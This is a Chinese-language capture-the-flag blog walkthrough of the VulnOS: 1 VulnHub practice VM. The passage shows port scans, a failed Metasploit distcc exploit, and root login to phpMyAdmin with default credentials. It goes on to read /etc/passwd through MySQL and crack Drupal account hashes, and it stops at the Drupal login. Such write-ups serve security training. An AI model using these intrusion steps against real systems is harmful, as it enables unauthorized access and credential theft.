<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.lug.ustc.edu.cn/css?family=Noto+Serif+SC:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha256-/4UQcSmErDzPCMAiuOiWPVVsNN2s3ZY/NsmXNcj0IFc=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-minimal.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"fdlucifer.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.15.0","exturl":true,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"mac"},"bookmark":{"enable":true,"color":"#222","save":"auto"},"mediumzoom":true,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":true,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":true,"preload":true}}</script><script src="/js/config.js"></script>

    <meta name="description" content="名称名称：VulnOS: 1发布日期：2014年3月22日 下载VulnOS.vdi-vbox.7z  Download (Mirror): https:&#x2F;&#x2F;download.vulnhub.com&#x2F;vulnos&#x2F;VulnOS.vdi-vbox.7z Download (Torrent): https:&#x2F;&#x2F;download.vulnhub.com&#x2F;vulnos&#x2F;VulnOS.vdi-vbox.7z">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub靶机渗透[vulnos-1]">
<meta property="og:url" content="https://fdlucifer.github.io/2020/04/16/vulnos-1/index.html">
<meta property="og:site_name" content="lUc1f3r11&#39;s blog">
<meta property="og:description" content="名称名称：VulnOS: 1发布日期：2014年3月22日 下载VulnOS.vdi-vbox.7z  Download (Mirror): https:&#x2F;&#x2F;download.vulnhub.com&#x2F;vulnos&#x2F;VulnOS.vdi-vbox.7z Download (Torrent): https:&#x2F;&#x2F;download.vulnhub.com&#x2F;vulnos&#x2F;VulnOS.vdi-vbox.7z">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://3.bp.blogspot.com/-Pe7E17cUN_Y/V2uK6vvqgnI/AAAAAAAABdY/DJf0tqzFYc0tCl48ZT2SADUWlF6vx5_KwCLcB/s1600/exp.png">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub258.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub259.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub260.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub261.jpg">
<meta property="og:image" content="https://1.bp.blogspot.com/-RFOIgH37Zno/V2uVUZEaH6I/AAAAAAAABeY/f5ttDoTmHOUaAGrMkpVCkgHRhCVIr_73wCLcB/s1600/passwd.png">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub262.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub263.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub264.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub265.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub266.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/haha.jpg">
<meta property="article:published_time" content="2020-04-16T07:23:57.000Z">
<meta property="article:modified_time" content="2020-08-16T17:01:32.043Z">
<meta property="article:author" content="lUc1f3r11">
<meta property="article:tag" content="vulnhub靶机练习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://3.bp.blogspot.com/-Pe7E17cUN_Y/V2uK6vvqgnI/AAAAAAAABdY/DJf0tqzFYc0tCl48ZT2SADUWlF6vx5_KwCLcB/s1600/exp.png">


<link rel="canonical" href="https://fdlucifer.github.io/2020/04/16/vulnos-1/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://fdlucifer.github.io/2020/04/16/vulnos-1/","path":"2020/04/16/vulnos-1/","title":"vulnhub靶机渗透[vulnos-1]"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>vulnhub靶机渗透[vulnos-1] | lUc1f3r11's blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="lUc1f3r11's blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">lUc1f3r11's blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">by lUc1f3r11</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags<span class="badge">42</span></a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories<span class="badge">32</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives<span class="badge">203</span></a></li><li class="menu-item menu-item-commonweal"><a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>Commonweal 404</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%90%8D%E7%A7%B0"><span class="nav-number">1.</span> <span class="nav-text">名称</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%8B%E8%BD%BD"><span class="nav-number">2.</span> <span class="nav-text">下载</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8F%8F%E8%BF%B0"><span class="nav-number">3.</span> <span class="nav-text">描述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">4.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#getshell"><span class="nav-number">5.</span> <span class="nav-text">getshell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%99%BB%E5%BD%95%E5%B9%B6%E6%8F%90%E6%9D%83"><span class="nav-number">6.</span> <span class="nav-text">登录并提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93"><span class="nav-number">7.</span> <span class="nav-text">知识点总结</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="lUc1f3r11"
      src="/images/blackhole.png">
  <p class="site-author-name" itemprop="name">lUc1f3r11</p>
  <div class="site-description" itemprop="description">All things about infosec & ctf</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">203</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">32</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">42</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL0ZEbHVjaWZlcg==" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;FDlucifer"><i class="fab fa-github fa-fw"></i>GitHub</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="bWFpbHRvOjExODUxNTE4NjdAcXEuY29t" title="E-Mail → mailto:1185151867@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly90d2l0dGVyLmNvbS9mZGx1Y2lmZXIxMQ==" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;fdlucifer11"><i class="fab fa-twitter fa-fw"></i>Twitter</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3Byb2ZpbGUucGhwP2lkPTEwMDAxOTY5NDUyODYyMA==" title="FB Page → https:&#x2F;&#x2F;www.facebook.com&#x2F;profile.php?id&#x3D;100019694528620"><i class="fab fa-facebook fa-fw"></i>FB Page</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly93d3cueW91dHViZS5jb20vY2hhbm5lbC9VQ19saVRlaDRSMUZNYnBWeGxwTWUtdnc=" title="YouTube → https:&#x2F;&#x2F;www.youtube.com&#x2F;channel&#x2F;UC_liTeh4R1FMbpVxlpMe-vw"><i class="fab fa-youtube fa-fw"></i>YouTube</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly93d3cuaW5zdGFncmFtLmNvbS95YW5nODkyOS8=" title="Instagram → https:&#x2F;&#x2F;www.instagram.com&#x2F;yang8929&#x2F;"><i class="fab fa-instagram fa-fw"></i>Instagram</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly9pbmZvc2VjLmV4Y2hhbmdlL0BsVWMxZjNyMTE=" title="infosec.exchange → https:&#x2F;&#x2F;infosec.exchange&#x2F;@lUc1f3r11"><i class="fa fa-stack-exchange fa-fw"></i>infosec.exchange</span>
      </span>
  </div>
  <div class="cc-license animated" itemprop="license">
    <span class="exturl cc-opacity" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/big/by_nc_sa.svg" alt="Creative Commons"></span>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="Back to top">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
    <div class="sidebar-inner sidebar-blogroll">
      <div class="links-of-blogroll animated">
        <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
          Links
        </div>
        <ul class="links-of-blogroll-list">
            <li class="links-of-blogroll-item">
              <span class="exturl" data-url="aHR0cHM6Ly9hdHN1ZDAubWUv" title="https:&#x2F;&#x2F;atsud0.me&#x2F;">atsud0</span>
            </li>
            <li class="links-of-blogroll-item">
              <span class="exturl" data-url="aHR0cHM6Ly9kcm9pZGthbGkuZ2l0aHViLmlvLw==" title="https:&#x2F;&#x2F;droidkali.github.io&#x2F;">记忆里的纯真</span>
            </li>
            <li class="links-of-blogroll-item">
              <span class="exturl" data-url="aHR0cHM6Ly94aWFvbGltYXJzLndvcmRwcmVzcy5jb20v" title="https:&#x2F;&#x2F;xiaolimars.wordpress.com&#x2F;">小离</span>
            </li>
        </ul>
      </div>
    </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://fdlucifer.github.io/2020/04/16/vulnos-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/blackhole.png">
      <meta itemprop="name" content="lUc1f3r11">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="lUc1f3r11's blog">
      <meta itemprop="description" content="All things about infosec & ctf">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="vulnhub靶机渗透[vulnos-1] | lUc1f3r11's blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          vulnhub靶机渗透[vulnos-1]
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2020-04-16 15:23:57" itemprop="dateCreated datePublished" datetime="2020-04-16T15:23:57+08:00">2020-04-16</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2020-08-17 01:01:32" itemprop="dateModified" datetime="2020-08-17T01:01:32+08:00">2020-08-17</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/vulnhub-walkthrough/" itemprop="url" rel="index"><span itemprop="name">vulnhub walkthrough</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">Views: </span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="Word count in article">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">Word count in article: </span>
      <span>2.6k</span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>9 mins.</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h3 id="名称"><a href="#名称" class="headerlink" title="名称"></a>名称</h3><p>名称：VulnOS: 1<br>发布日期：2014年3月22日</p>
<h3 id="下载"><a href="#下载" class="headerlink" title="下载"></a>下载</h3><p>VulnOS.vdi-vbox.7z</p>
<ul>
<li>Download (Mirror): <span class="exturl" data-url="aHR0cHM6Ly9kb3dubG9hZC52dWxuaHViLmNvbS92dWxub3MvVnVsbk9TLnZkaS12Ym94Ljd6">https://download.vulnhub.com/vulnos/VulnOS.vdi-vbox.7z<i class="fa fa-external-link-alt"></i></span></li>
<li>Download (Torrent): <span class="exturl" data-url="aHR0cHM6Ly9kb3dubG9hZC52dWxuaHViLmNvbS92dWxub3MvVnVsbk9TLnZkaS12Ym94Ljd6LnRvcnJlbnQ=">https://download.vulnhub.com/vulnos/VulnOS.vdi-vbox.7z.torrent<i class="fa fa-external-link-alt"></i></span></li>
</ul>
<span id="more"></span>

<h3 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h3><p>欢迎使用VulnOS！</p>
<p>这是制定的第一个脆弱目标，因为想回馈社区。为使事情成为可能的社区而努力！！！</p>
<p>目标是root它并找到操作系统内部的所有漏洞！这是一个ubuntu服务器10.04 LTS（已经制成了很多bug！！！）请勿在生产环境中使用此Box！这是一台VM，它是使用Virtualbox 4.3.8制作的-因此采用.vdi格式。</p>
<p>联网 ：<br>此box是使用桥接网络制成的，并使用DHCP获取IP地址（在构建时为192.168.1.66）。因此，最好将攻击操作系统和TARGET BOX共享到192.168.1.1&#x2F;24的IP范围也许您可以使用m0n0wall进行设置并设置静态IP地址。<br>如果找不到目标的IP地址，请联系blakrat1 AT gmail DOT com。将为您提供root用户和密码以进行登录…。</p>
<p>希望你觉得这个box有用 ！！！</p>
<p>VulnHub独家！</p>
<h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>上nmap</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\HASEE&gt;nmap -sn -v 192.168.56.*</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.56.124</span><br><span class="line">Host is up (0.00s latency).</span><br><span class="line">MAC Address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\HASEE&gt;nmap -p- -v -sV 192.168.56.124</span><br><span class="line">PORT      STATE SERVICE     VERSION</span><br><span class="line">22/tcp    open  ssh         OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">23/tcp    open  telnet      Linux telnetd</span><br><span class="line">25/tcp    open  smtp        Postfix smtpd</span><br><span class="line">53/tcp    open  domain      ISC BIND 9.7.0-P1</span><br><span class="line">80/tcp    open  http        Apache httpd 2.2.14 ((Ubuntu))</span><br><span class="line">110/tcp   open  pop3        Dovecot pop3d</span><br><span class="line">111/tcp   open  rpcbind     2 (RPC <span class="comment">#100000)</span></span><br><span class="line">139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</span><br><span class="line">143/tcp   open  imap        Dovecot imapd</span><br><span class="line">389/tcp   open  ldap        OpenLDAP 2.2.X - 2.3.X</span><br><span class="line">445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</span><br><span class="line">512/tcp   open  <span class="built_in">exec</span>        netkit-rsh rexecd</span><br><span class="line">513/tcp   open  login?</span><br><span class="line">514/tcp   open  shell       Netkit rshd</span><br><span class="line">901/tcp   open  http        Samba SWAT administration server</span><br><span class="line">993/tcp   open  ssl/imap    Dovecot imapd</span><br><span class="line">995/tcp   open  ssl/pop3    Dovecot pop3d</span><br><span class="line">2000/tcp  open  sieve       Dovecot timsieved</span><br><span class="line">2049/tcp  open  nfs         2-4 (RPC <span class="comment">#100003)</span></span><br><span class="line">3306/tcp  open  mysql       MySQL 5.1.73-0ubuntu0.10.04.1</span><br><span class="line">3632/tcp  open  tcpwrapped</span><br><span class="line">6667/tcp  open  irc         IRCnet ircd</span><br><span class="line">8070/tcp  open  ucs-isc?</span><br><span class="line">8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1</span><br><span class="line">10000/tcp open  http        MiniServ 0.01 (Webmin httpd)</span><br><span class="line">33370/tcp open  mountd      1-3 (RPC <span class="comment">#100005)</span></span><br><span class="line">56041/tcp open  status      1 (RPC <span class="comment">#100024)</span></span><br><span class="line">56144/tcp open  nlockmgr    1-4 (RPC <span class="comment">#100021)</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># nmap -T4 -p 3632 -v 192.168.56.124</span></span><br><span class="line">PORT     STATE SERVICE</span><br><span class="line">3632/tcp open  distccd</span><br></pre></td></tr></table></figure>

<p>在服务上花了足够的时间并尝试利用它们之后，成功利用了端口3632上托管的“distccd”服务。</p>
<p>搜索该服务的漏洞利用程序，发现了Meatsploit漏洞利用</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; search distccd</span><br><span class="line"></span><br><span class="line">Matching Modules</span><br><span class="line">================</span><br><span class="line"></span><br><span class="line">   <span class="comment">#  Name                           Disclosure Date  Rank       Check  Description</span></span><br><span class="line">   -  ----                           ---------------  ----       -----  -----------</span><br><span class="line">   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution</span><br></pre></td></tr></table></figure>

<p>设置RHOST IP地址并启动漏洞利用程序。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">msf5 exploit(unix/misc/distcc_exec) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP double handler on 192.168.56.102:3456 </span><br><span class="line">[-] 192.168.56.124:3632 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br></pre></td></tr></table></figure>

<p>不知怎么回事，利用不了这个漏洞，可能是漏洞太古老，太久远了，只能尝试其他方法了。</p>
<p>非典型情况-许多端口是开放的。<br>更喜欢从快速验证（例如MySQL默认帐户，NFS等）开始，进行深度渗透测试。<br>试图使用默认凭据（例如root：root，root：toor，root：password，root：mysql）登录MySQL服务器。不幸的是没有成功。还检查了NFS，但没有好消息…</p>
<h3 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># rpcinfo -p 192.168.56.124</span></span><br><span class="line">   program vers proto   port  service</span><br><span class="line">    100000    2   tcp    111  portmapper</span><br><span class="line">    100000    2   udp    111  portmapper</span><br><span class="line">    100024    1   udp  60680  status</span><br><span class="line">    100024    1   tcp  40626  status</span><br><span class="line">    100021    1   udp  38218  nlockmgr</span><br><span class="line">    100021    3   udp  38218  nlockmgr</span><br><span class="line">    100021    4   udp  38218  nlockmgr</span><br><span class="line">    100021    1   tcp  44108  nlockmgr</span><br><span class="line">    100021    3   tcp  44108  nlockmgr</span><br><span class="line">    100021    4   tcp  44108  nlockmgr</span><br><span class="line">    100003    2   udp   2049  nfs</span><br><span class="line">    100003    3   udp   2049  nfs</span><br><span class="line">    100003    4   udp   2049  nfs</span><br><span class="line">    100003    2   tcp   2049  nfs</span><br><span class="line">    100003    3   tcp   2049  nfs</span><br><span class="line">    100003    4   tcp   2049  nfs</span><br><span class="line">    100005    1   udp  55441  mountd</span><br><span class="line">    100005    1   tcp  33014  mountd</span><br><span class="line">    100005    2   udp  55441  mountd</span><br><span class="line">    100005    2   tcp  33014  mountd</span><br><span class="line">    100005    3   udp  55441  mountd</span><br><span class="line">    100005    3   tcp  33014  mountd</span><br><span class="line">root@kali:~<span class="comment"># showmount -e 192.168.56.124</span></span><br><span class="line">Export list <span class="keyword">for</span> 192.168.56.124:</span><br></pre></td></tr></table></figure>

<p>尝试使用OpenSSH。进行了大量研究，发现一些专门用于OpenSSH &lt;&#x3D; 5.3的漏洞利用，但是它不起作用。</p>
<ul>
<li><img src="https://3.bp.blogspot.com/-Pe7E17cUN_Y/V2uK6vvqgnI/AAAAAAAABdY/DJf0tqzFYc0tCl48ZT2SADUWlF6vx5_KwCLcB/s1600/exp.png"></li>
</ul>
<p>好的，现在轮到Web浏览。默认网页如下所示</p>
<ul>
<li><img src="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub258.jpg"></li>
</ul>
<p>源代码也不包含任何有用的信息。单击被转发到的链接</p>
<ul>
<li><img src="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub259.jpg"></li>
</ul>
<p>嗯，也没什么有用的东西。应该记住，端口80不仅是一个开放的http端口。运行dirbuster爆破目录试试</p>
<ul>
<li><img src="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub260.jpg"></li>
</ul>
<p>该目标使用Apache 2.2.14，它存在公共漏洞利用程序（CVE-2010-0425）。Metasploit具有专用于此版本的辅助模块。但是，现在只想在没有其他方法的情况下使用metasploit。</p>
<p>Dirbuster发现该Web应用程序还具有phpmyadmin面板。因此，请尝试使用默认凭据登录，如root&#x2F;toor。答对了！</p>
<ul>
<li><img src="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub261.jpg"></li>
</ul>
<p>以root身份成功登录！很好。尝试从&#x2F;etc&#x2F;shadow加载数据，但与&#x2F;etc&#x2F;passwd相反（可能权限不足）没有成功。</p>
<ul>
<li><img src="https://1.bp.blogspot.com/-RFOIgH37Zno/V2uVUZEaH6I/AAAAAAAABeY/f5ttDoTmHOUaAGrMkpVCkgHRhCVIr_73wCLcB/s1600/passwd.png"></li>
</ul>
<p>有系统用户的完整列表。尝试使用outfile语句创建phpinfo文件，但未成功。</p>
<p>检查一下可以从数据库中检索到什么在Drupal6数据库中，可以找到</p>
<ul>
<li><img src="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub262.jpg"></li>
</ul>
<p>好！但是必须破解这些hash。在mysql数据库中，可以找到以下凭证</p>
<ul>
<li><img src="https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/vulnhub263.jpg"></li>
</ul>
<p>非常好，因为拥有与&#x2F;etc&#x2F;passwd文件中部分相同的用户名。破解了几个密码，例如drupal6密码drupal6。所以，现在专注于Drupal</p>
<p>浏览器访问下面的url并使用drupal6&#x2F;drupal6登录</p>
